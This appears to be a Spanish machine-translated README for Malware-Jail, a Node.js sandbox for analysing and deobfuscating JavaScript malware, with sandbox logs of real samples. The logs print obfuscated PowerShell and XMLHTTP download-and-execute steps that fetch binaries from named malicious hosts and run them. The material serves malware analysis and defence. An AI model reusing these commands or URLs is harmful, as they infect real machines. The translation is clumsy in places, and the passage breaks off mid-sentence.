Malware-Jail: herramienta para análisis de malware de Javascript, eliminación de ofuscación y extracción de carga útil

Malware-Jail es una caja de arena para el análisis semiautomático de malware Javascript, la eliminación de ofuscación y la extracción de carga útil. Está escrito para Node.js.

Funciona en cualquier sistema operativo. Desarrollado y probado en Linux, Node.js v6.6.0.

NotaNota: debido al uso de algunas funciones de ES6, necesitará Node.js> = 6.x.

Malware-Jail está escrito para Sandbox de nodo 'vm'. Actualmente implementa el contexto de Windows Scripting Host (WScript) env / wscript.js , al menos la parte que utiliza con frecuencia el malware. El contexto del navegador de Internet está parcialmente implementado env / browser.js .

Índice de contenidos

    Cómo instalar Malware-Jail

    Necesitará Node.js y npm instalados. Porque malware-jail se basa en minimist, iconv-lite y entity.

    Extracto de GitHub

    Extrae la fuente con git:

    git clone https://github.com/HynekPetrak/malware-jail.git
    cd malware-jail
    

    Luego instale todas las dependencias (minimista, entidad, iconv-lite) con:

    npm install
    

    Uso

    bash@linux# node jailme.js -h -b list
    7 May 20:54:52 - mailware-jail, a malware sandbox ver. 0.19
    7 May 20:54:52 - ------------------------
    7 May 20:54:52 - Usage: node jailme.js  [[-e file1] [-e file2] .. ] [-c ./config.json] 
    7 May 20:54:52 -                [-o ofile] [-b id] 
    7 May 20:54:52 -                [-s odir] [--down] [malware1 [malware2] .. ]
    7 May 20:54:52 -        -c config .. use alternative config file, preceed with ./
    7 May 20:54:52 -        -e ifile ... js that simulates specific environment
    7 May 20:54:52 -        -o ofile ... name of the file where sandbox shall be dumped at the end
    7 May 20:54:52 -        -s odir  ... output directory for generated files (malware payload)
    7 May 20:54:52 -        -b id    ... browser type, use -b list for possible values
    7 May 20:54:52 -        -t msecs ... number of miliseconds before terminating execution, default 1 minute
    7 May 20:54:52 -        --trace  ... print stack trace with every log line
    7 May 20:54:52 -        --down   ... allow downloading malware payloads from remote servers
    7 May 20:54:52 -        --h404   ... on download return always HTTP/404
    7 May 20:54:52 -        malware  ... js with the malware code
    7 May 20:54:52 - If no arguments are specified the default values are taken from config.json
    7 May 20:54:52 - Possible -b values: [ 'IE11_W10', 'IE8', 'IE7', 'iPhone', 'Firefox', 'Chrome' ]
    

    Puede encontrar un archivo de malware deshabilitado en la carpeta de muestras. Ejecute el análisis con:

    node jailme.js -c ./config_wscript_only.json --down=y malware/example.js
    

    Malware basado en navegador de Internet que puede estar probando

    node jailme.js -b IE11_W10 malware/example_browser.js
    

    Al final del análisis, el contexto completo de la caja de arena se descarga en unsandbox_dump_after.json'expediente.

    Es posible que desee examinar las siguientes entradas de 'sandbox_dump_after.json':

    • eval_calls - matriz de todos los argumentos para las llamadas a eval (). Útil si eval () se usa para desofuscación.
    • wscript_saved_files - contenido de todos los archivos que el malware intentó eliminar. Los archivos reales también se guardan en el directorio de salida /.
    • wscript_urls - todas las URL que el malware pretendía OBTENER o PUBLICAR.
    • wscript_objects - Creación de objetos WScript o ActiveX.

    'sandbox_dump_after.json'usa JSONPath, implementado por JSON-js / cycle.js, para guardar referencias duplicadas o cíclicas al mismo objeto.

    Salida de muestra

    bash@linux# node jailme.js malware/example.js
    11 Jan 00:06:24 - Malware sandbox ver. 0.2
    11 Jan 00:06:24 - ------------------------
    11 Jan 00:06:24 - Sandbox environment sequence: env/eval.js,env/wscript.js
    11 Jan 00:06:24 - Malware files: malware/example.js
    11 Jan 00:06:24 - Output file for sandbox dump: sandbox_dump_after.json
    11 Jan 00:06:24 - Output directory for generated files: output/
    11 Jan 00:06:24 - ==> Preparing Sandbox environment.
    11 Jan 00:06:24 -  => Executing: env/eval.js
    11 Jan 00:06:24 - Preparing sandbox to intercept eval() calls.
    11 Jan 00:06:24 -  => Executing: env/wscript.js
    11 Jan 00:06:24 - Preparing sandbox to emulate WScript environment.
    11 Jan 00:06:24 - ==> Executing malware file(s).
    11 Jan 00:06:24 -  => Executing: malware/example.js
    11 Jan 00:06:24 - ActiveXObject(WScript.Shell)
    11 Jan 00:06:24 - Created: WScript.Shell[1]
    11 Jan 00:06:24 - WScript.Shell[1].ExpandEnvironmentStrings(%TEMP%)
    11 Jan 00:06:24 - ActiveXObject(MSXML2.XMLHTTP)
    11 Jan 00:06:24 - Created: MSXML2.XMLHTTP[2]
    11 Jan 00:06:24 - MSXML2.XMLHTTP[2].open(POST,http://EXAMPLE.COM/redir.php,false)
    11 Jan 00:06:24 - MSXML2.XMLHTTP[2].setRequestHeader(Content-Type, application/x-www-form-urlencoded)
    11 Jan 00:06:24 - MSXML2.XMLHTTP[2].send(iTlOlnxhMXnM=0.588860877091065&jndj=IT0601)
    11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Not sending data, if you want to interract with remote server, set --down=y
    11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Calling onreadystatechange() with dummy data
    11 Jan 00:06:24 - ActiveXObject(ADODB.Stream)
    11 Jan 00:06:24 - Created: ADODB_Stream[3]
    11 Jan 00:06:24 - ADODB_Stream[3].Open()
    11 Jan 00:06:24 - ADODB_Stream[3].Write(str) - 10001 bytes
    11 Jan 00:06:24 - ADODB_Stream[3].SaveToFile(%TEMP%57020551.dll, 2)
    11 Jan 00:06:24 - WScript.Shell[1].Exec(rundll32 %TEMP%57020551.dll, DllRegisterServer)
    11 Jan 00:06:24 - ADODB_Stream[3].Close()
    11 Jan 00:08:42 - ==> Script execution finished, dumping sandbox environment to a file.
    11 Jan 00:08:42 - Saving: output/_TEMP__49629482.dll
    11 Jan 00:08:42 - Saving: output/_TEMP__38611354.pdf
    11 Jan 00:08:42 - Generated file saved
    11 Jan 00:08:42 - Generated file saved
    11 Jan 00:08:42 - The sandbox context has been  saved to: sandbox_dump_after.json
    

    En el ejemplo anterior, la carga útil se ha extraído en output / _TEMP__49629482.dll y output / _TEMP__38611354.pdf

    Ejemplos de

    los malware La carpeta contiene muestras de malware del mundo real. La mayor parte se descargó de https://malwr.com.

    Ejemplo: análisis de Wileen.js

    Tomando un script malicioso de malwr.com: Wileen.js

    Aparentemente, el malware no se ejecuta cuando se ejecuta desde un navegador:

    if (typeof document == "undefined") {

    Por lo tanto, es posible que desee utilizar un archivo de configuración alternativo que no cargue los componentes del navegador / DOM:

    node jailme.js --down=y -c ./config_wscript_only.json  malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js
    

    Interesante uso de Powershell:

    1 Oct 13:05:34 -  => Executing: malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js
    1 Oct 13:05:34 - ActiveXObject(WScRipT.SHEll)
    1 Oct 13:05:34 - Created: WScript.Shell[1]
    1 Oct 13:05:34 - WScript.Shell[1].Run(cmD.EXE /c POWE^R^s^he^lL.eXE     -ExEc^U^Tio^n^p^oLIC^y^   B^Y^pas^S -NOpro^Fi^L^e^    -^W^InD^Ow^sT^yle^  HI^ddeN^  (^Ne^W^-^OBJ^ecT^     S^YST^EM.net.Webc^L^I^E^n^T^).^dOWn^L^Oa^d^fI^lE^(^'http://click.doubledating.ru/js/boxun4.bin','%appdatA%.exE')^;^stA^Rt-^p^rO^c^eS^s  ^'%aPpdata%.eXe', false, undefined)
    1 Oct 13:05:34 - ==> Cleaning up sandbox.
    1 Oct 13:05:34 - ==> Script execution finished, dumping sandbox environment to a file.
    1 Oct 13:05:34 - The sandbox context has been  saved to: sandbox_dump_after.json
    

    Ejemplo: análisis ORDER-10455.js

    Tomando JavaScript malicioso de malwr.com: ORDER-10455.js

    Primero ejecute sin interactuar con servidores remotos:

    node jailme.js malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.js
    

    obtienes algo como:

    ... 
    29 Sep 23:17:21 - Calling eval() no.: 5
    29 Sep 23:17:21 - ActiveXObject(MSXML2.XMLHTTP)
    29 Sep 23:17:21 - Created: MSXML2.XMLHTTP[9]
    29 Sep 23:17:21 - MSXML2.XMLHTTP[9].open(GET,http://caopdjow.top/user.php?f=0.dat,false)
    29 Sep 23:17:21 - MSXML2.XMLHTTP[9].send(undefined)
    29 Sep 23:17:21 - MSXML2.XMLHTTP[9] Not sending data, if you want to interact with remote server, set --down=y
    29 Sep 23:17:21 - MSXML2.XMLHTTP[9].responseBody = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)'
    29 Sep 23:17:21 - MSXML2.XMLHTTP[9].status="200"
    29 Sep 23:17:21 - MSXML2.XMLHTTP[9].send(undefined) finished
    29 Sep 23:17:21 - MSXML2.XMLHTTP[9].status.get() => 200
    29 Sep 23:17:21 - MSXML2.XMLHTTP[9].ResponseBody.get() => aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)
    29 Sep 23:17:21 - ActiveXObject(Scripting.FileSystemObject)
    29 Sep 23:17:21 - Scripting.FileSystemObject[10] created.
    29 Sep 23:17:21 - Scripting.FileSystemObject[10].GetSpecialFolder(2)
    29 Sep 23:17:21 - ActiveXObject(ADODB.Stream)
    29 Sep 23:17:21 - Created: ADODB_Stream[11]
    29 Sep 23:17:21 - ADODB_Stream[11].Open()
    29 Sep 23:17:21 - ADODB_Stream[11].Type="1"
    29 Sep 23:17:21 - ADODB_Stream[11].content="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)"
    29 Sep 23:17:21 - ADODB_Stream[11].Write(str) - 10000 bytes
    29 Sep 23:17:21 - ADODB_Stream[11].size="10000"
    29 Sep 23:17:21 - ADODB_Stream[11].Position = '0'
    29 Sep 23:17:21 - ADODB_Stream[11].SaveToFile(Special_Folder__2w8z05i7y2.exe, 2)
    29 Sep 23:17:21 - ADODB_Stream[11].content.get() => aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)
    29 Sep 23:17:21 - ADODB_Stream[11].Close()
    29 Sep 23:17:21 - ActiveXObject(WScript.Shell)
    29 Sep 23:17:21 - Created: WScript.Shell[12]
    29 Sep 23:17:21 - WScript.Shell[12].Run(Special_Folder__2w8z05i7y2.exe, undefined, undefined)
    29 Sep 23:17:21 - Returning: 'undefined'
    29 Sep 23:17:21 - ==> Cleaning up sandbox.
    29 Sep 23:17:21 - ==> Script execution finished, dumping sandbox environment to a file.
    29 Sep 23:17:21 - MSXML2.XMLHTTP[9].ResponseBody.get() => aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)
    29 Sep 23:17:21 - Saving: output/Special_Folder__2_w8z05i7y2.exe
    29 Sep 23:17:21 - Generated file saved
    29 Sep 23:17:21 - The sandbox context has been  saved to: sandbox_dump_after.json
    

    Parece ser un comportamiento de eliminación de ofuscación "estándar" para finalmente poder descargar un binario exe y ejecutarlo.

    Si queremos obtener la carga útil real, ejecutémosla con '--down = y':

    node jailme.js --down=y  malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.js > malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.out
    

    Ejemplo: análisis de Norri.js

    Tomando JavaScript malicioso de malwr.com: Norri.js

    Correr:

    node jailme.js --down=y malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js
    

    usted obtiene:

    30 Sep 01:02:11 -  => Executing: malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js
    30 Sep 01:02:11 - Strict mode: false
    30 Sep 01:02:11 - Calling eval() no.: 1
    30 Sep 01:02:11 - WScript.CreateObject(WScript.Shell)
    30 Sep 01:02:11 - Created: WScript.Shell[9]
    30 Sep 01:02:11 - WScript.SpecialFolders(Desktop)
    30 Sep 01:02:11 - WScript.CreateShortcut(Desktop/?eno.lnk)
    30 Sep 01:02:11 - Created: WshShortcut[10](Desktop/?eno.lnk)
    30 Sep 01:02:11 - WshShortcut[10](Desktop/?eno.lnk).FullName.get() => Desktop/?eno.lnk
    30 Sep 01:02:11 - WScript.CreateObject(Scripting.FileSystemObject)
    30 Sep 01:02:11 - Scripting.FileSystemObject[11] created.
    30 Sep 01:02:11 - WScript.CreateObject(WScript.Shell)
    30 Sep 01:02:11 - Created: WScript.Shell[12]
    30 Sep 01:02:11 - WScript.CreateObject(MSXML2.XMLHTTP)
    30 Sep 01:02:11 - Created: MSXML2.XMLHTTP[13]
    30 Sep 01:02:11 - WScript.CreateObject(ADODB.Stream)
    30 Sep 01:02:11 - Created: ADODB_Stream[14]
    30 Sep 01:02:11 - Scripting.FileSystemObject[11].GetSpecialFolder(2) => TemporaryFolder/
    30 Sep 01:02:11 - Scripting.FileSystemObject[11].GetTempName() => TempFile[15]
    30 Sep 01:02:11 - MSXML2.XMLHTTP[13].open(GET,http://girlx.tornadodating.ru/js/boxun4.bin,0)
    30 Sep 01:02:11 - MSXML2.XMLHTTP[13] string true
    30 Sep 01:02:11 - MSXML2.XMLHTTP[13].async="false"
    30 Sep 01:02:11 - MSXML2.XMLHTTP[13].async.get() => false
    30 Sep 01:02:11 - MSXML2.XMLHTTP[13].send(undefined)
    30 Sep 01:02:15 - MSXML2.XMLHTTP[13].onreadystatechange(), readyState = 4 length: 196608 status: 200
    30 Sep 01:02:15 - MSXML2.XMLHTTP[13] statusText = null
    30 Sep 01:02:15 - MSXML2.XMLHTTP[13].responseBody = 'MZ?@?!?L?!This program cannot be ... (truncated)'
    30 Sep 01:02:15 - MSXML2.XMLHTTP[13].status="200"
    30 Sep 01:02:15 - MSXML2.XMLHTTP[13].onreadystatechange() undefined
    30 Sep 01:02:15 - MSXML2.XMLHTTP[13].send(undefined) finished
    30 Sep 01:02:15 - ADODB_Stream[14].type="1"
    30 Sep 01:02:15 - MSXML2.XMLHTTP[13].ResponseBody.get() => MZ?@?!?L?!This program cannot be ... (truncated)
    30 Sep 01:02:15 - ADODB_Stream[14].Open()
    30 Sep 01:02:15 - ADODB_Stream[14].content="MZ?@?!?L?!This program cannot be ... (truncated)"
    30 Sep 01:02:15 - ADODB_Stream[14].Write(str) - 196608 bytes
    30 Sep 01:02:15 - ADODB_Stream[14].size="196608"
    30 Sep 01:02:15 - ADODB_Stream[14].SaveToFile(TemporaryFolder/TempFile[15], undefined)
    30 Sep 01:02:15 - ADODB_Stream[14].content.get() => MZ?@?!?L?!This program cannot be ... (truncated)
    30 Sep 01:02:15 - ADODB_Stream[14].Close()
    30 Sep 01:02:15 - WScript.Shell[12].Run(cmd.exe /c TemporaryFolder/TempFile[15], 0, undefined)
    30 Sep 01:02:15 - Scripting.FileSystemObject[11].DeleteFile(script_full_name.js)
    30 Sep 01:02:15 - ==> Cleaning up sandbox.
    30 Sep 01:02:15 - ==> Script execution finished, dumping sandbox environment to a file.
    30 Sep 01:02:15 - MSXML2.XMLHTTP[13].ResponseBody.get() => MZ?@?!?L?!This program cannot be ... (truncated)
    30 Sep 01:02:16 - Saving: output/TemporaryFolder_TempFile[15]
    30 Sep 01:02:16 - Generated file saved
    30 Sep 01:02:16 - The sandbox context has been  saved to: sandbox_dump_after.json
    

    El comportamiento es evidente en el registro. La carga útil se extrajo a la salida / TemporaryFolder_TempFile[15] expediente.

    Ejemplo: análisis del pescador EK

    Descargue y extraiga Angler EK de un archivo pcap en PESCADOR EK ENVÍA CRYPTOWALL en un malware / angler / angler_full.html.

    Quite la parte que no es de Fisher y guárdela como malware / angler / angler_stripped.html.

    Para eliminar